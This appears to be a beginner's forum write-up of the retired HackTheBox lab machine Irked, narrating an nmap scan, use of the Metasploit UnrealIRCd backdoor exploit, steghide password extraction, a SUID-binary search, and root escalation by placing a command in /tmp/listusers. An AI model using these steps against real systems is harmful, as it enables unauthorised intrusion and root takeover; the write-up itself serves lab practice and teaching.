Hey nullers. This is my write-up about Irked, a retired machine from HackTheBox, an awesome place to practice your skills on infosec.
This is my first ever writeup so feedback is more than welcome
I started with what I think 90% of everyone out there starts, an nmap scan.
Visiting the website at http://10.10.10.117/ we get this content
From the beggining we get the first clue: IRC. But my first scan wasn’t satisfying, so I looked a little deeper with
nmap -p- 10.10.10.117
So there is an open irc port. The website was telling us that the irc was not working correctly, so if we connect to it, we might find something that we can take advantage of.
There I spent some time researching what a MOTD file is, but it didn’t help me. So the next step for me is to search for a IRC exploit on Metasploit
(skid detected) in a desperate hope for an exploit.
After seeing the results and spending a minute or so, my brain finally started to kick: the specific IRC version (Unreal184.108.40.206) was vulnurable to backdoor command execution
After setting the RHOST
set RHOST 10.10.10.117 and RPORT
set RPORT 6697, I run the exploit
Hacker’s voice: I’m in.
After navigating through the system I found a user named “djmardov”. In his Documents file there were 2 files: user.txt and .backup. Being only able to read the backup file, I came across this result:
What I understood is that steg stands for steganography, i.e. the way of hiding data within other files. But there must exist an image for this, because most steg challenges that I’ve encountered hide data inside image files. And there was only one image available in the hole machine:
For steg challenges that requires extracting information from an image with a password, I either use steghide
steghide --extract -sf irked.jpg -p UPupDOWNdownLRlrBAbaSSss or I often visit this site. This time, to show something different than the classic steghide, I entered this image with the password on the website and I got the djmardov’s password.
I logged in via ssh and user.txt was patiently waiting for me there.
[email protected]:~/Documents$ cat user.txt cat user.txt 4a*********
Now on to root!
My privilage escalation skills are not that great, so for a start I use some standard commands from the 0x00sec forum. After running
find / -perm -g=s -o -perm -u=s -type f 2>/dev/null
I came across some binaries that were executed as root.
It took me quite some time to figure this out. An experienced hacker would easily recognize the binaries that stand out in a normal Linux machine.
After testing some binaries I came across the /usr/bin/viewusers. After putting it to the test I get this error.
So this particular binary was searching for the /tmp/listusers file and was executing whatever command the file contained. So the solution is to create the /tmp/listusers file and write a command that the binary will execute as root, i.e.
After giving the permission to execute the file with
chmod +x /usr/bin/viewusers I executed the binary and there’s our flag
[email protected]:~$ echo "cat /root/root.txt" > /tmp/listusers [email protected]:~$ chmod+x /tmp/listusers [email protected]:~$ /usr/bin/viewuser This application is being devleoped to set and test user permissions It is still being actively developed (unknown) :0 2018-11-17 13:54 (:0) djmardov pts/1 2018-11-17 14:19 (10.10.14.23) 8d8e9*************************
I think Irked was an easy box . Nevertheless, it taught me to be patient and to read everything line by line.